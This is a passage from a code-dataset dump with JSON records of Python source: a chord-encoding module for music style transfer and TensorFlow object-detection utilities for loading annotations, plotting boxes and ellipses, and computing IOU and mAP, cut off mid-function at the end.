"line_number": 21, "usage_type": "call"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 25, "usage_type": "name"}, {"api_name": "home.models.Genre.objects.all", "line_number": 25, "usage_type": "call"}, {"api_name": "home.models.Genre.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "home.models.Genre", "line_number": 25, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 25, "usage_type": "attribute"}, {"api_name": "django.forms.Form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 27, "usage_type": "name"}, {"api_name": "django.forms.CharField", "line_number": 28, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "django.forms.TextInput", "line_number": 29, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 29, "usage_type": "name"}]}
+{"seq_id": "14544952438", "text": "import contextlib\nimport json\nimport os\nimport numpy as np\nfrom numba.core.errors import NumbaDeprecationWarning\nimport warnings\n\nfrom midi import Midi\nfrom constants import VAMP_PATH, CHORD_ENCODINGS_PATH\n\nos.environ[\"VAMP_PATH\"] = VAMP_PATH\nwarnings.filterwarnings(\"ignore\", category=NumbaDeprecationWarning)\n\nfrom chord_extractor.extractors import Chordino # noqa\n\n\nclass Style:\n encoding_type = \"style\"\n\n def __init__(self, midi: Midi):\n self.midi = midi\n\n # File that stores encodings of chords based on vocabulary\n if not os.path.exists(CHORD_ENCODINGS_PATH):\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([1, {\"N\": 0}], f)\n\n with open(CHORD_ENCODINGS_PATH, \"r\") as f:\n self.num_chords, self.vocab = json.load(f)\n\n # Silence output from Chordino\n with open(os.devnull, \"w\") as devnull:\n with contextlib.redirect_stdout(devnull):\n self.extract_style()\n self.generate_encoding()\n\n def extract_style(self):\n chordino = Chordino()\n conversion_file_path = chordino.preprocess(self.midi.filepath)\n\n chords = chordino.extract(conversion_file_path)\n self.chords = [(c.chord, c.timestamp) for c in chords]\n\n def generate_encoding(self):\n # One hot encodes all chords in the midi\n self.encoding = np.zeros((self.midi.piano_roll.shape[1], self.num_chords))\n\n for (chord, t1), (chord, t2) in zip(self.chords, self.chords[1:]):\n if chord not in self.vocab:\n self.vocab[chord] = self.num_chords\n self.num_chords += 1\n\n self.encoding = np.hstack(\n (self.encoding, np.zeros((self.encoding.shape[0], 1)))\n )\n\n start = self.midi.time_to_tick(t1)\n end = self.midi.time_to_tick(t2)\n index = self.vocab[chord]\n\n self.encoding[start:end, index] = 1\n\n with open(CHORD_ENCODINGS_PATH, \"w\") as f:\n json.dump([self.num_chords, self.vocab], f)\n", "repo_name": "VikaasVarma/Music-Style-Transfer", "sub_path": "embeddings/style.py", "file_name": "style.py", "file_ext": "py", "file_size_in_byte": 2066, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.environ", "line_number": 11, "usage_type": "attribute"}, {"api_name": "constants.VAMP_PATH", "line_number": 11, "usage_type": "name"}, {"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "numba.core.errors.NumbaDeprecationWarning", "line_number": 12, "usage_type": "name"}, {"api_name": "midi.Midi", "line_number": 20, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 24, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 24, "usage_type": "argument"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 25, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 26, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 28, "usage_type": "argument"}, {"api_name": "json.load", "line_number": 29, "usage_type": "call"}, {"api_name": "os.devnull", "line_number": 32, "usage_type": "attribute"}, {"api_name": "contextlib.redirect_stdout", "line_number": 33, "usage_type": "call"}, {"api_name": "chord_extractor.extractors.Chordino", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 54, "usage_type": "call"}, {"api_name": "constants.CHORD_ENCODINGS_PATH", "line_number": 63, "usage_type": "argument"}, {"api_name": "json.dump", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "22116161809", "text": "import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport numpy as np\nimport os\nimport json\nfrom six import BytesIO\nfrom PIL import Image\nfrom sklearn.preprocessing import MinMaxScaler\nfrom matplotlib.patches import Ellipse, Rectangle\nfrom object_detection.utils import visualization_utils as viz_utils\n\n\ndef load_json_images_annotations(filename: str, label_dict: dict, subdir: str = \".\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n single json annotation file.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images referred to in the annotation file.\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n annotations = json.load(f)\n\n image_list = []\n box_list = []\n label_list = []\n\n for ii, entry in enumerate(annotations.values()):\n\n image_file = entry['filename']\n image_file = os.path.join(subdir, image_file)\n # print(image_file)\n image_list.append(image_file)\n # get image size:\n with Image.open(image_file) as im:\n img_width, img_height = im.size\n\n boxes = []\n labels = []\n for region in entry['regions']:\n assert region['shape_attributes']['name'] == 'rect'\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n width = region['shape_attributes']['width']\n height = region['shape_attributes']['height']\n # read class label:\n label = region['region_attributes']['class']\n\n xmin = x / img_width\n ymin = y / img_height\n xmax = (x + width) / img_width\n ymax = (y + height) / img_height\n\n boxes.append([ymin, xmin, ymax, xmax])\n labels.append(label_dict[label])\n\n box_list.append(np.array(boxes, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, box_list, label_list\n\n\ndef load_json_images_annotations_from_list(filename: str, label_dict: dict, subdir: str = \".\",\n annot_suffix: str = \".json\"):\n \"\"\"\n Extract the list of images, ground truth annotations, and their corresponding classes from a\n list of image files and corresponding json annotation files.\n NOTE: this function expects json files created with the VIA (VGG Image Annotator) tool.\n\n :param filename: str\n The name of the input list file\n :param label_dict: dict\n A dictionary with the class names and integer classes (starting with 1) as key-value pairs,\n e.g.: {'apple': 1, 'orange': 2, 'pear': 3}\n :param subdir: str\n The name of the subdirectory containing the images and the corresponding annotation files.\n :param annot_suffix: str\n The suffix of the annotation files such as: image_file='example.jpeg' -> annotation_file='example'\n :return: (list of str, list of np.ndarray, list of np.ndarray)\n The lists of images, annotations, and labels.\n \"\"\"\n\n with open(filename) as f:\n files = np.loadtxt(f, dtype='str')\n\n image_list = []\n annot_list = []\n label_list = []\n\n for ii, image_file in enumerate(files):\n\n image_list.append(os.path.join(subdir, image_file))\n\n annot_file = image_file.strip('.jpg').strip('.jpeg').strip('.png') + annot_suffix\n with open(os.path.join(subdir, annot_file)) as af:\n annotations = json.load(af)\n\n # skip uppermost dict level with only one entry:\n annotations = list(annotations.values())[0]\n\n assert annotations['filename'] == image_file, \"Image filename `{}` differs from annotation file attribute `{}`\" \\\n .format(image_file, annotations['filename'])\n\n annot = []\n labels = []\n for region in annotations['regions']:\n\n assert region['shape_attributes']['name'] == 'rect' or region['shape_attributes']['name'] == 'ellipse'\n\n if region['shape_attributes']['name'] == 'rect':\n # read rectangle parameters:\n x = region['shape_attributes']['x']\n y = region['shape_attributes']['y']\n w = region['shape_attributes']['width']\n h = region['shape_attributes']['height']\n rx = w / 2.\n ry = h / 2.\n cx = x + rx\n cy = y + ry\n theta = 0.\n # read class label:\n label = region['region_attributes']['class']\n\n # overwrite ellipse entry to rectangle entry in json:\n region['shape_attributes'] = \\\n {'name': 'ellipse', 'cx': round(cx), 'cy': round(cy), 'rx': rx, 'ry': ry, 'theta': theta}\n\n else:\n # read ellipse parameters:\n cx = region['shape_attributes']['cx']\n cy = region['shape_attributes']['cy']\n rx = region['shape_attributes']['rx']\n ry = region['shape_attributes']['ry']\n theta = region['shape_attributes']['theta']\n # read class label:\n label = region['region_attributes']['class']\n\n annot.append([cx, cy, rx, ry, theta])\n labels.append(label_dict[label])\n\n annot_list.append(np.array(annot, dtype=np.float32))\n label_list.append(np.array(labels, dtype=np.int32))\n\n return image_list, annot_list, label_list\n\n\ndef load_image_into_numpy_array(filename):\n \"\"\"\n Load an image from file into a numpy array of shape\n (height, width, channels), where channels=3 for RGB.\n\n :param filename: str\n Path to th input file.\n :return: numpy.ndarray, uint8\n The array with the input image.\n \"\"\"\n img_data = tf.io.gfile.GFile(filename, 'rb').read()\n image = Image.open(BytesIO(img_data))\n (im_width, im_height) = image.size\n return np.array(image.getdata()).reshape(\n (im_height, im_width, 3)).astype(np.uint8)\n\n\ndef plot_detections(image_np, boxes, classes, scores, category_index, min_score_thresh=0.8, image_name=None):\n \"\"\"\n Wrapper function for the object_detection.utils.visualization_utils.visualize_boxes_and_labels_on_image_array()\n method.\n\n :param image_np: numpy.ndarray, uint8\n Array with the input image with shape (height, width, 3).\n :param boxes: numpy.ndarray\n Array with the bounding box parameters of shape (n_objects, 4).\n :param classes: numpy.ndarray\n Array with the class labels of shape (n_objects, ).\n Indices must be 1-based, and must match the keys in `category_index`.\n :param scores: numpy.ndarray\n Array with the detection scores. If None, groundtruth boxes are assumed,\n and all boxes will be plotted as black with neither classes nor scores.\n :param category_index: dict\n Dictionary of category dictionaries (each holding a category index `id` and category name `name`)\n keyed by category indices.\n :param min_score_thresh: float\n The minimum required score for a box to be shown.\n :param image_name: str\n Name of the output image file.\n \"\"\"\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, boxes, classes, scores, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh)\n if image_name is not None:\n plt.imsave(image_name, image_np_annotated)\n else:\n plt.imshow(image_np_annotated)\n\n\ndef plot_images_with_boxes(images, gt_boxes, gt_labels,\n pred_boxes, pred_labels, pred_scores,\n category_index, label_id_offset,\n figname='image_list_with_boxes', figformat='jpg',\n min_score_thresh=0.5,\n max_boxes_to_draw=20,\n skip_scores=False, skip_labels=False):\n \"\"\"\n Plot a list / batch of images with the ground truth and\n (optionally) predicted boxes (with labels and scores) overlaid.\n\n :param images: array-like with tf.Tensor elements of shape (height, width, channels)\n OR tf.Tensor with batch dimension of shape (batch_size, height, width, channels)\n The list or batch of image tensors to be plotted.\n :param gt_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n The list or batch of ground truth boxes to be plotted.\n :param gt_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n The list or batch of ground truth labels.\n :param pred_boxes: array-like with tf.Tensor elements of shape (n_boxes, 4)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, 4)\n OR None\n The list or batch of predicted boxes to be plotted. If None, only the ground truth boxes will be plotted.\n :param pred_labels: array-like with tf.Tensor elements of shape (n_boxes, n_classes) or (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes, n_classes) or (batch_size, n_boxes)\n OR None\n The list or batch of predicted labels. If None, only the ground truth boxes will be plotted.\n :param pred_scores: array-like with tf.Tensor elements of shape (n_boxes,)\n OR tf.Tensor with batch dimension of shape (batch_size, n_boxes)\n OR None\n The list or batch of prediction scores. If None, only the ground truth boxes will be plotted.\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param figname: str\n The path and name of the output figure.\n :param figformat: str\n File format of the output figure. Only valid pyplot output formats are allowed.\n :param min_score_thresh: float\n The minimum detection score threshold for a predicted object to be plotted.\n :param max_boxes_to_draw: int OR None\n The maximum number of detection boxes to be plotted. If None, draw all boxes.\n :param skip_scores: boolean\n Whether to skip the drawing of bounding boxes.\n :param skip_labels: boolean\n Whether to skip score when drawing a single detection.\n :return:\n \"\"\"\n\n n_img = len(images)\n image_shape = tf.shape(images[0]).numpy()\n scaler = MinMaxScaler(feature_range=(0, 255))\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n if nrows == 1:\n ncols = n_img\n fig = plt.figure(figsize=(ncols * 10, 10 * nrows))\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np = scaler.fit_transform(images[ii].numpy().reshape(-1, 1)). \\\n reshape(image_shape).astype('int32')\n\n gt_boxes_np = gt_boxes[ii].numpy()\n\n # check if ground truth labels are one-hot encoded:\n if tf.shape(gt_labels[0]).numpy().shape[0] > 1:\n gt_labels_np = tf.argmax(gt_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n gt_labels_np = gt_labels[ii].numpy().astype('int32')\n\n image_np_annotated = image_np.copy()\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, gt_boxes_np, gt_labels_np + label_id_offset, None, category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=max_boxes_to_draw, groundtruth_box_visualization_color='black', line_thickness=1)\n\n if None not in (pred_boxes, pred_labels, pred_scores):\n\n pred_boxes_np = pred_boxes[ii].numpy()\n\n # check if predicted labels are one-hot encoded:\n if tf.shape(pred_labels[0]).numpy().shape[0] > 1:\n pred_labels_np = tf.argmax(pred_labels[ii], axis=1).numpy().flatten().astype('int32')\n else:\n pred_labels_np = pred_labels[ii].numpy().astype('int32')\n\n pred_scores_np = pred_scores[ii].numpy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated, pred_boxes_np, pred_labels_np + label_id_offset, pred_scores_np, category_index,\n use_normalized_coordinates=True, min_score_thresh=min_score_thresh,\n max_boxes_to_draw=max_boxes_to_draw, line_thickness=1,\n skip_scores=skip_scores, skip_labels=skip_labels)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_boxes(dataset,\n category_index,\n label_id_offset,\n rescale: bool = True,\n figname: str = 'image_batch_with_boxes',\n figformat: str = 'jpg'):\n \"\"\"\n Plots a batch of images with their corresponding object bounding boxes and labels.\n\n :param dataset: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, boxes, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param label_id_offset: int\n The offset of label id's with respect to a labelling scheme that starts with 0.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n\n image_list_np = []\n boxes_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, boxes, labels in dataset.unbatch():\n\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n boxes_list.append(boxes.numpy())\n labels_list.append(tf.argmax(labels.to_tensor(), axis=1).numpy().flatten().astype('int32'))\n\n n_img = len(image_list_np)\n\n ncols = 3\n nrows = int(np.ceil(n_img / ncols))\n fig = plt.figure(figsize=(30, 10 * nrows))\n\n for ii in range(n_img):\n\n plt.subplot(nrows, ncols, ii + 1)\n\n image_np_annotated = image_list_np[ii].copy()\n\n image_np_annotated = viz_utils.visualize_boxes_and_labels_on_image_array(\n image_np_annotated,\n boxes_list[ii],\n labels_list[ii] + label_id_offset,\n np.ones([boxes_list[ii].shape[0]]),\n category_index,\n use_normalized_coordinates=True,\n max_boxes_to_draw=None,\n groundtruth_box_visualization_color='black',\n skip_scores=True,\n skip_labels=False,\n line_thickness=2)\n\n plt.imshow(image_np_annotated)\n\n plt.tight_layout()\n plt.savefig(figname + '.' + figformat, format=figformat)\n fig.clf()\n plt.close(fig)\n del fig\n\n\ndef plot_image_batch_with_ellipses(data_batch, category_index, ell2box=False, rescale=True,\n figname='image_batch_with_ellipses', figformat='pdf'):\n \"\"\"\n Plots a batch of images with their corresponding object annotation ellipses and labels.\n\n :param data_batch: tf.Dataset\n A batched tensorflow dataset object containing the entries:\n image, image shape, ellipses, labels\n :param category_index: dict\n A dictionary containing category dictionaries (each holding category index `id` and category name `name`)\n keyed by category indices.\n :param ell2box: bool\n Whether to also plot the bounding rectangles of the ellipses.\n :param rescale: bool\n Whether to rescale the image into the [0, 255] range.\n :param figname: str\n The filename for the output figure.\n :param figformat: str\n The format of the output figure. Valid matplotlib.pyplot formats are accepted.\n \"\"\"\n image_list_np = []\n shapes_list = []\n ellipse_list = []\n box_list = []\n labels_list = []\n\n if rescale:\n scaler = MinMaxScaler(feature_range=(0, 255))\n else:\n scaler = None\n\n for img, img_shape, ellipses, labels in data_batch.unbatch():\n # image_list_np.append(img.numpy().astype('int32'))\n if scaler is not None:\n image_list_np.append(scaler.fit_transform(img.numpy().reshape(-1, 1)).reshape(img.shape).astype('int32'))\n else:\n image_list_np.append(img.numpy())\n # print(img_shape)\n shapes_list.append(img_shape.numpy().astype('int32'))\n ellipse_list.append(ellipses.numpy())\n labels_list.append(labels.numpy().astype('int32'))\n if ell2box:\n ellipses = ellipses.to_tensor()\n boxes = bounding_rectagle(ellipses)\n box_list.append(boxes.numpy())\n\n for ii, image_np in enumerate(image_list_np):\n\n dpi = 400\n\n fig = plt.figure(figsize=(20, 10), dpi=dpi, tight_layout=True)\n ax = fig.add_subplot(1, 1, 1)\n _ = ax.imshow(image_np, aspect=1, interpolation='none')\n\n plt.rcParams[\"figure.autolayout\"] = True\n\n # plt.subplot(nrows, ncols, ii + 1)\n plot_gt_ellipses(ax, ellipse_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n if box_list:\n plot_gt_boxes(ax, box_list[ii], labels_list[ii], category_index, np.ones_like(ellipse_list[ii]))\n\n cy = int(image_np.shape[0] // 2)\n cx = int(image_np.shape[1] // 2)\n\n # print(shapes_list[ii], cy, cx)\n plot_bb(ax, cx, cy, shapes_list[ii])\n # print(annot_list[ii])\n # print(labels_list[ii])\n\n if figname is not None:\n plt.savefig(figname + '_' + str(ii + 1) + '.' + figformat, format=figformat, dpi=dpi)\n else:\n plt.show()\n\n\ndef plot_bb(axis, cx, cy, shape):\n height, width, channels = shape\n\n rr = Rectangle(xy=(cx - width / 2, cy - height / 2), width=width, height=height)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('green')\n rr.set_alpha(1)\n rr.set_linewidth(4)\n rr.set_fill(False)\n\n\ndef bounding_rectagle(ellipse_parameters):\n \"\"\"\n Compute the parameters of the bounding rectangles for a set of ellipses.\n\n :param ellipse_parameters: tf.Tensor\n Tensor of shape (n_objects, 5) with the ellipse parameters:\n x_center, y_center, x_radius, y_radius, rotation angle.\n :return: tf.Tensor\n Tensor of shape (n_objects, 4) with the resulting bounding box parameters:\n ymin, xmin, ymax, xmax\n \"\"\"\n cx = ellipse_parameters[:, 0]\n cy = ellipse_parameters[:, 1]\n rx = ellipse_parameters[:, 2]\n ry = ellipse_parameters[:, 3]\n theta = ellipse_parameters[:, 4]\n\n pi = tf.constant(np.pi)\n epsilon = 1e-10\n\n tx1 = tf.atan(-1 * (ry * tf.sin(theta)) / (rx * tf.cos(theta) + epsilon))\n tx2 = tx1 + pi\n # print(tx1, tx2)\n\n x1 = rx * tf.cos(theta) * tf.cos(tx1) - ry * tf.sin(theta) * tf.sin(tx1)\n x2 = rx * tf.cos(theta) * tf.cos(tx2) - ry * tf.sin(theta) * tf.sin(tx2)\n # print(x1, x2)\n\n # ty1 = np.arctan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty1 = tf.atan((ry * tf.cos(theta)) / (rx * tf.sin(theta) + epsilon))\n ty2 = ty1 + pi\n # print(ty1, ty2)\n\n y1 = rx * tf.sin(theta) * tf.cos(ty1) + ry * tf.cos(theta) * tf.sin(ty1)\n y2 = rx * tf.sin(theta) * tf.cos(ty2) + ry * tf.cos(theta) * tf.sin(ty2)\n # print(y1, y2)\n\n half_width = tf.reduce_max(tf.stack((x1, x2), axis=0), axis=0)\n half_height = tf.reduce_max(tf.stack((y1, y2), axis=0), axis=0)\n # tf.print(half_width)\n # tf.print(half_width.shape)\n\n ymin = cy - half_height\n xmin = cx - half_width\n ymax = cy + half_height\n xmax = cx + half_width\n\n rectangle_params = tf.stack((ymin, xmin, ymax, xmax), axis=1)\n\n return rectangle_params\n\n\ndef plot_gt_ellipses(axis, ellipses, classes, category_index, scores):\n\n for i, annot in enumerate(ellipses):\n cx, cy, rx, ry, theta = annot\n\n ell = Ellipse(xy=(cx, cy), width=2 * rx, height=2 * ry, angle=theta * 180.0 / np.pi, zorder=i + 2)\n axis.add_artist(ell)\n ell.set_clip_box(axis.bbox)\n ell.set_color('black')\n ell.set_alpha(1)\n ell.set_linewidth(0.2)\n ell.set_fill(False)\n\n\ndef plot_gt_boxes(axis, boxes, classes, category_index, scores):\n\n for i, annot in enumerate(boxes):\n ymin, xmin, ymax, xmax = annot\n\n rr = Rectangle(xy=(xmin, ymin), width=xmax - xmin, height=ymax - ymin)\n axis.add_artist(rr)\n rr.set_clip_box(axis.bbox)\n rr.set_color('blue')\n rr.set_alpha(1)\n rr.set_linewidth(0.2)\n rr.set_fill(False)\n\n\ndef get_lists_from_batch(data_batch):\n # Unpack the ragged tensors of this batch.\n # The first dimension of each ragged tensor is the batch size.\n images_batch_rtensor, gt_boxes_rtensor, gt_classes_rtensor = data_batch\n\n # Convert the ragged tensors of this batch to lists of tensors:\n images_list = tf.split(images_batch_rtensor, images_batch_rtensor.shape[0], axis=0)\n images_list = [tf.squeeze(item.to_tensor(), axis=0) for item in images_list]\n\n gt_boxes_list = tf.split(gt_boxes_rtensor, gt_boxes_rtensor.shape[0], axis=0)\n gt_boxes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_boxes_list]\n\n gt_classes_list = tf.split(gt_classes_rtensor, gt_classes_rtensor.shape[0], axis=0)\n gt_classes_list = [tf.squeeze(item.to_tensor(), axis=0) for item in gt_classes_list]\n\n return images_list, gt_boxes_list, gt_classes_list\n\n\ndef get_list_from_ragged_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item.to_tensor(), axis=0) for item in tensor_list]\n\n return tensor_list\n\n\ndef get_list_from_batch(data_batch):\n # Convert the ragged tensors of this batch to lists of tensors:\n tensor_list = tf.split(data_batch, data_batch.shape[0], axis=0)\n tensor_list = [tf.squeeze(item, axis=0) for item in tensor_list]\n\n return tensor_list\n\n\n@tf.function()\ndef compute_iou_matrix(box_arr1, box_arr2):\n \"\"\"\n Compute the IOU matrix for two sets of bounding boxes.\n\n :param box_arr1: tf.Tensor\n Tensor of shape (n_objects, 4) with the first set of bounding box parameters.\n :param box_arr2: tf.Tensor\n Tensor of shape (n_objects, 4) with the second set of bounding box parameters.\n :return: tf.Tensor\n The resulting IOU matrix.\n \"\"\"\n\n epsilon = tf.constant(1e-9, dtype='float32')\n\n x11, y11, x12, y12 = tf.split(box_arr1, 4, axis=1)\n x21, y21, x22, y22 = tf.split(box_arr2, 4, axis=1)\n\n xA = tf.maximum(x11, tf.transpose(x21))\n yA = tf.maximum(y11, tf.transpose(y21))\n xB = tf.minimum(x12, tf.transpose(x22))\n yB = tf.minimum(y12, tf.transpose(y22))\n\n interArea = tf.maximum((xB - xA + epsilon), 0) * tf.maximum((yB - yA + epsilon), 0)\n boxAArea = (x12 - x11 + epsilon) * (y12 - y11 + epsilon)\n boxBArea = (x22 - x21 + epsilon) * (y22 - y21 + epsilon)\n\n iou_matrix = interArea / (boxAArea + tf.transpose(boxBArea) - interArea)\n\n return iou_matrix\n\n\n@tf.function()\ndef compute_map_iou_per_image(gt_boxes_tensor, gt_labels_tensor, pred_boxes_tensor, pred_labels_tensor,\n pred_boxes_scores,\n iou_threshold=0.5, n_scores=100):\n \"\"\"\n Compute the mean average precision (mAP) and the mean IOU for an image. The mean is taken across all classes,\n and in case of the mean IOU, across all score thresholds for each class.\n :param gt_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the ground truth boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param gt_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the ground truth class labels (starting from 0).\n :param pred_boxes_tensor: tf.Tensor, shape=(n_boxes,4), dtype=float32\n A tensor with the predicted boxes holding (ymin, xmin, ymax, xmax) values for each box in\n relative coordinates in [0,1].\n :param pred_labels_tensor: tf.Tensor, shape=(n_boxes,), dtype=int32\n A tensor with the predicted class labels (starting from 0).\n :param pred_boxes_scores: tf.Tensor, shape=(n_boxes,), dtype=float32\n A tensor with the probability scores (of the predicted class) of the predicted boxes.\n :param iou_threshold: float\n Threshold of the IOU metric in the computation of the mean average precision (mAP).\n :param n_scores: int\n The number of score thresholds for sampling the precision-recall curve.\n :return: (tf.Tensor, tf.Tensor)\n The mean average precision (across classes) and the mean IOU (across scores and classes).\n \"\"\"\n epsilon = tf.constant(1e-10)\n\n classes = tf.unique(gt_labels_tensor).y # determine the unique classes present in current image, ...\n num_cl = tf.shape(classes)[0] # ... and count them\n\n # initialize tensor array for aggregating each average precision value per class\n average_precisions = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n scores_maxf1 = tf.TensorArray(tf.float32, size=0, dynamic_size=True, clear_after_read=True)\n mean_ious = tf.TensorArray(tf.float32, size=num_cl, dynamic_size=False, clear_after_read=True)\n\n # loop over the classes present in the current image:\n for jj in tf.range(num_cl):\n\n i_class = classes[jj]\n\n # initialize tensor arrays for aggregating the precisions and recalls for each score threshold:\n precisions = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n recalls = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n ious = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n f1scores = tf.TensorArray(tf.float32, size=n_scores, dynamic_size=False, clear_after_read=True)\n\n # get the ground truth boxes corresponding to the current (i_class) class:\n index_gt_class = \\\n tf.squeeze(tf.where(\n tf.equal(gt_labels_tensor, i_class)\n ), axis=1)\n gt_boxes_tensor_class = tf.reshape(tf.gather(gt_boxes_tensor, index_gt_class), shape=(-1, 4))\n\n # get the scores corresponding to the current (i_class) class:\n pred_boxes_scores_class = tf.gather(pred_boxes_scores,\n tf.squeeze(tf.where(tf.equal(pred_labels_tensor, i_class))))\n # determine max score for current class:\n max_score_class = tf.reduce_max(pred_boxes_scores_class)\n # create score grid for current class for sampling the precision-recall curve:\n scores = tf.cast(tf.linspace(0.0, max_score_class, n_scores), dtype='float32')\n # NOTE: the number of true positives for a score threshold above the maximum score will be zero,\n # therefore the recall will be undefined. For the cases, the precision vs recall curve takes the constant\n # value of precision=1 at all recalls by definition. We account for this by setting the upper limit for\n # the score grid to max(score) for the class, and by adding the last precision recall point at the end of\n # the loop below:\n\n # for i_score, score in enumerate(scores[:-1]):\n for i_score in tf.range(n_scores - 1):\n score = scores[i_score]\n\n # get the predicted boxes corresponding to the current (i_class) class:\n index_pred_class = \\\n tf.squeeze(tf.where(\n tf.logical_and(tf.equal(pred_labels_tensor, i_class),\n tf.greater_equal(pred_boxes_scores, score))\n ), axis=1)\n pred_boxes_tensor_class = tf.gather(pred_boxes_tensor, index_pred_class)\n\n # Compute IOU matrix: rows correspond to gt boxes, columns to predicted boxes of current class:\n iou_matrix_class = compute_iou_matrix(gt_boxes_tensor_class, pred_boxes_tensor_class)\n\n mean_iou_boxes = tf.reduce_mean(tf.reduce_max(iou_matrix_class, axis=1))\n\n # Compute the number of true positives for this class:\n # count the rows in `iou_matrix_class` that have (at least) one iou > iou_threshold column\n tp = tf.reduce_sum(tf.cast(\n tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1),\n dtype='float32'))\n\n # Compute the number of false negatives for this class:\n # count the rows in `iou_matrix_class` that do not have any iou > iou_threshold column\n fn = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)),\n dtype='float32'))\n\n # Compute the number of false positives for this class:\n # count the columns in `iou_matrix_class` that do not have any iou > iou_threshold row\n fp1 = tf.reduce_sum(tf.cast(\n tf.logical_not(tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=0)),\n dtype='float32'))\n # for each row in `iou_matrix_class`, count all redundant iou > iou_threshold columns\n # get a boolean mask for the rows with at least one detection\n mask = tf.reduce_any(tf.greater_equal(iou_matrix_class, iou_threshold), axis=1)\n # get a subset of the iou matrix with the above boolean mask\n iou_matrix_class_detections = tf.boolean_mask(iou_matrix_class, mask)\n # count all redundant detections\n fp2 = 